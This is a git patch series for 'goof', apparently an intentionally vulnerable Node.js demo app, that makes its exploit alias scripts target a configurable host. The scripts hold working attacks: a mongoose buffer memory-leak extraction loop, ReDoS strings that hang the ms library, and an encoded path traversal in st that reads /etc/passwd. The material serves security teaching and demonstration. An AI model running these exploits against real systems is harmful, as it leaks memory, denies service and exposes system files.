From f8a1f3b249d222c8a25789e2c7fec084378221d0 Mon Sep 17 00:00:00 2001
From: Guy Podjarny <guypod@users.noreply.github.com>
Date: Tue, 18 Oct 2016 11:29:38 +0100
Subject: [PATCH 1/2] Add Heroku generated app.json

---
 app.json | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 app.json

diff --git a/app.json b/app.json
new file mode 100644
index 0000000000..1fd3b73a48
--- /dev/null
+++ b/app.json
@@ -0,0 +1,23 @@
+{
+  "name": "goof",
+  "scripts": {
+  },
+  "env": {
+    "MONGOLAB_URI": {
+      "required": true
+    }
+  },
+  "formation": {
+    "web": {
+      "quantity": 1
+    }
+  },
+  "addons": [
+    "mongolab"
+  ],
+  "buildpacks": [
+    {
+      "url": "heroku/nodejs"
+    }
+  ]
+}

From 6ebce5273d3884c4cb7a363ba5481727cd438165 Mon Sep 17 00:00:00 2001
From: Guy Podjarny <guypod@gmail.com>
Date: Mon, 28 Nov 2016 10:09:02 +0100
Subject: [PATCH 2/2] chore: support an alternate host

---
 exploits/mongoose-exploits.sh | 18 +++++++++++-------
 exploits/ms-exploits.sh       | 11 ++++++++---
 exploits/st-exploits.sh       | 15 ++++++++++-----
 3 files changed, 29 insertions(+), 15 deletions(-)

diff --git a/exploits/mongoose-exploits.sh b/exploits/mongoose-exploits.sh
index 3aec24f225..09dbb8043a 100644
--- a/exploits/mongoose-exploits.sh
+++ b/exploits/mongoose-exploits.sh
@@ -1,26 +1,30 @@
 ### Note: these exploits use the httpie command line utility
 
+if [ -z "$GOOF_HOST" ]; then 
+	export GOOF_HOST=http://localhost:3001
+fi
+ 
 # start
-alias mon1="http http://localhost:3001/ --headers"
+alias mon1="http $GOOF_HOST/ --headers"
 
 # Works as advertised
-alias mon2="echo 'content=Buy Beer' | http --form http://localhost:3001/create -v"
+alias mon2="echo 'content=Buy Beer' | http --form $GOOF_HOST/create -v"
 
 # Works with json
-alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json http://localhost:3001/create -v"
+alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json $GOOF_HOST/create -v"
 
 # Works with number string
-alias mon4="echo '{\"content\":\"800\"}' | http --json http://localhost:3001/create -v"
+alias mon4="echo '{\"content\":\"800\"}' | http --json $GOOF_HOST/create -v"
 
 # Exploit start - integer
-alias mon5="echo '{\"content\":800}' | http --json http://localhost:3001/create -v"
+alias mon5="echo '{\"content\":800}' | http --json $GOOF_HOST/create -v"
 
 # Switch to only showing the response body
-alias mon6="echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D"
+alias mon6="echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D"
 
 # Repeatedly extract memory
 # window 1
-alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D >> leakedmem.bin"
+alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D >> leakedmem.bin"
 
 # window 2 - see strings in the response
 alias mon_repeat2="tail -f leakedmem.bin | strings"
diff --git a/exploits/ms-exploits.sh b/exploits/ms-exploits.sh
index f35714152e..ea5a08c5c0 100644
--- a/exploits/ms-exploits.sh
+++ b/exploits/ms-exploits.sh
@@ -1,8 +1,13 @@
 # Working via curl
-alias ms1="echo 'content=Call mom in 20 minutes' | http --form http://localhost:3001/create -v"
+
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+alias ms1="echo 'content=Call mom in 20 minutes' | http --form $GOOF_HOST/create -v"
 
 # Works with long string that matches
-alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form http://localhost:3001/create -v"
+alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v"
 
 # Hangs with long string that doesn't match
-alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form http://localhost:3001/create -v"
+alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v"
diff --git a/exploits/st-exploits.sh b/exploits/st-exploits.sh
index e4f1d3a57f..dba780e5c8 100644
--- a/exploits/st-exploits.sh
+++ b/exploits/st-exploits.sh
@@ -1,14 +1,19 @@
 # Works as advertised
-alias st1="curl http://localhost:3001/public/about.html"
+
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+alias st1="curl $GOOF_HOST/public/about.html"
 
 # Directory listing (not necessary)
-alias st2="curl http://localhost:3001/public/"
+alias st2="curl $GOOF_HOST/public/"
 
 # Failed ../
-alias st3="curl http://localhost:3001/public/../../../"
+alias st3="curl $GOOF_HOST/public/../../../"
 
 # Exploit start
-alias st4="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2e%2e/"
+alias st4="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2e%2e/"
 
 # Exploit full
-alias st5="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+alias st5="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"